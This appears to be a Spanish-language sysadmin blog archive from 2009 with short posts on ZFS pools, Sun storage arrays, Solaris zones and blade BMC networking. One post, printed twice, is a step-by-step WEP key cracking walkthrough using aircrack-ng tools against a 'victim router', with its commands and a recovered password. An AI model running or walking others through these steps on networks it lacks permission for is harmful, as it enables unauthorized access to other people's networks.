miércoles, 7 de octubre de 2009
Validar volumenes en zfs - desmontarlo y destruirlo
root@masterserver2 # zpool list //Lista los pool zfs actualmente creados
NAME SIZE USED AVAIL CAP HEALTH ALTROOT
backup_pva 3.17T 325M 3.17T 0% ONLINE -
storage0 527G 142G 385G 26% ONLINE -
root@masterserver2 # zpool status backup_pva //Lista los discos que se encuentran atachados al un pool zfs Ej: backup_pva
pool: storage0
state: ONLINE
scrub: none requested
config:
NAME STATE READ WRITE CKSUM
backup_pva ONLINE 0 0 0
c3t600A0B800011EF78000079F34832C463d0s0 ONLINE 0 0 0
c3t600A0B800011EE120000A45C4958A7D8d0s2 ONLINE 0 0 0
c3t600A0B800011EE120000A577496DE26Ad0s0 ONLINE 0 0 0
zfs unmount -f backup_pva/pva //Desmontamos el volumen fisico zfs
zfs destroy -r backup_pva //Destruimos el volumen zfs
zpool destroy -r backup_pva //Destruimos el Pool zfs
viernes, 4 de septiembre de 2009
Como generar reporte de status (alarmas, estadisticas) del arreglo 6540
root@masterserver # sscs login -u root -h 172.XX.XXX.XXX
//Identificamos cual array es al que queremos generar el reporte: escogemos el stk6540-01
root@masterserver # sscs list array
Array: arregloremoto-stk6140-01
Array: arreglolocal-stk6140-01
Array: stk6540-01
Array: ARRAY01
Array: ARRAY02
//Aplicamos el siguiente comando:
root@masterserver # /opt/SUNWsefms/bin/supportData -d stk6540-01 -p /export/home/usuario -o supporData_stk6540-01
Starting the collection process for stk6540-01
Starting data collection
Collecting the array profile...
Collecting the MEL data...
Collecting the RLS data...
Collecting persistant registrations...
Collecting bad block data...
Collecting the drive log data...
Collecting the object bundle...
Collecting the alarm data...
Collecting the state capture...
Collecting the NVSRAM data...
Collecting the volume statistics...
Collecting the SOC data...
Zipping up the data files
Completion Status: Task completed succesfully.
La siguiente es la sintaxis de comando:
//The "supportData" utility is in the directory /opt/SUNWsefms/bin/
//The syntax to run the "supportData" utility is :
//
//supportData -d
//
//Valid identifiers are the
//
//where :
//
//
//
//
//
//
//and :
//
//
//
//
//The output file will be in a zip format.
miércoles, 2 de septiembre de 2009
CLI - Reporte volumenes array 6540
root@masterserver # sscs login -u root -h 172.XX.XXX.XXX
//Sequimos con el comando que indica con que array queremos trabajar, con cual virtual disk y que nos de una relacion de los volumenes y las caracteristicas del virtual disk.
root@masterserver # sscs list --array stk6540-01 vdisk 1
Virtual Disk: 1
Status: Optimal
State: Ready
Number of Disks: 10
RAID Level: 1
Total Capacity: 681.135 GB
Configured Capacity: 594.000 GB
Available Capacity: 87.135 GB
Array Name: stk6540-01
Array Type: 6540
Disk Type: Fibre Channel
Maximal Volume Size: 3.129 GB
Associated Disks:
Disk: t0d05
Disk: t0d04
Disk: t0d03
Disk: t0d02
Disk: t0d01
Disk: t1d01
Disk: t1d02
Disk: t1d03
Disk: t1d04
Disk: t1d05
Associated Volumes:
Volume: heo_01_v4901_ora_datos
Volume: heo_01_v4901_ora_indices
Volume: heo_01_v4902
Volume: heo_01_v4902_ora_datos
Volume: heo_01_v4904
Volume: stk5320-01-H0_ndmp
Volume: stk5320-01-H1_ndmp
viernes, 31 de julio de 2009
Creación de Zonas - Solaris
set zonepath=/zonas/CT1BOZSUNOAS-SPE4
set autoboot=true
set ip-type=exclusive
add net
set physical=nxge1
set physical=nxge2
end
verify
commit
miércoles, 29 de julio de 2009
Como hackear clave WEP en red inalambrica - Wifislax
wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng.
NOTA: con este comando configuramos tambien la interfas en modo monitor
#airmon-ng start wifi0 6
2.#iwconfig , para revisar la configuracion en la que quedo la interfaz de red en este caso la interfaz de red se llama wifi0.
3.Configuramos la velocidad de transmision a 1MB para evitar problemas de transmision
#iwconfig wifi0 rate 1M
4.Despues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar redes por el canal 6. Para esto utilizamos el siguiente comando:
#airodump-ng -w aaaa -c6 wifi0
donde aaaa puede ser cualquier archivo.
NOTA: tambien se puede hacer de la siguiente manera:
wifislax-> Herramientas wireless -> Kismet .
Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:
Dispositivo: wifi0
Driver: ipw2915
Nombre: wifislax
En este ejemploencontramos una ESSID: LD, BSSID: 00:24:01:24:AD:FF, ENCHRIPTER: WEB, CHANNEL: 6
5.Seguidamente despues de haber escogido la red con encriptacion wep que vamos a atacar, ejecutamos el siguiente comando:
#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:
…...
Enviando peticion de autentificacion
Autentificacion conseguida
Enviando peticion de asociacion
Asociacion conseguida
6.Ahora empezaremmos a inyectar paquetes usando el siguiente comando:
#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.
7.Logrando la cantidad de paquetes indicado procedemos a encontrar la clave. Para esto haremos uso del siguiente comando:
#aircrack-ptw LD-01.cap
Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz.
Este comando me entregara la clave tanto en exadecimal como en su equivalente ASCII:
….
Equivalente en ASCII: LADINO4763356
Como hackear clave WEP en red inalambrica - Wifislax
wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng
NOTA: con este comando configuramos tambien la interfas en modo monitor
#airmon-ng start wifi0 6
2. #iwconfig, para revisar la configuracion en la que quedó la interfaz de red, en este caso la interfaz de red se llama wifi0.
3. Configuramos la velocidad de transmisión a 1MB para evitar problemas de transmisión.
#iwconfig wifi0 rate 1M
4. Desues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar las redes que se encuentren en el canal 6 por el cual nuestra interfaz esta escuchando. Para esto utilizamos el siguiente comando:
#airodump-ng -w aaaa -c6 wifi0
donde aaaa puede ser cualquier nombre para este archivo.
wifislax-> Herramientas wireless -> Kismet .
Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:
Dispositivo: wifi0
Driver: ipw2915
Nombre: wifislax
En este ejemplo encontramos una ESSID:LD, BSSID:
5. Seguidamente despues de haber escogido la red con encriptacino WEP que vamos a atacar, ejecutamos el siguiente comando:
#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:
…...
Enviando peticion de autentificacion
Autentificacion conseguida
Enviando peticion de asociacion
Asociacion conseguida
6. Ahora empezaremos a intectar paquetes usando el siguiente comando:
#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.
7. Logrando la cantidad de paquetes indicado procederemos a encontrar la clave. Para esto haremos uso del siguiente comando:
#aircrack-ptw LD-01.cap
Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz. Este comando me entrega la clave tanto en exadecimal como en su equivalente ASCII.
.....
Equivalente en ASCII: LADINO4763356
lunes, 27 de julio de 2009
Configuracion Interfaz BMC Sun Blade 6250
-> set /CH/BL9/SP/network pendingipaddress=172.28.236.29
-> set /CH/BL9/SP/network pendingipdiscovery=static
-> set /CH/BL9/SP/network pendingipgateway=172.28.239.254
-> set /CH/BL9/SP/network pendingipnetmask=255.255.252.0
-> set /CH/BL9/SP/network commitpending=true
//Muestra la configuracion de Red para esa blade
-> show /CH/BL9/SP/network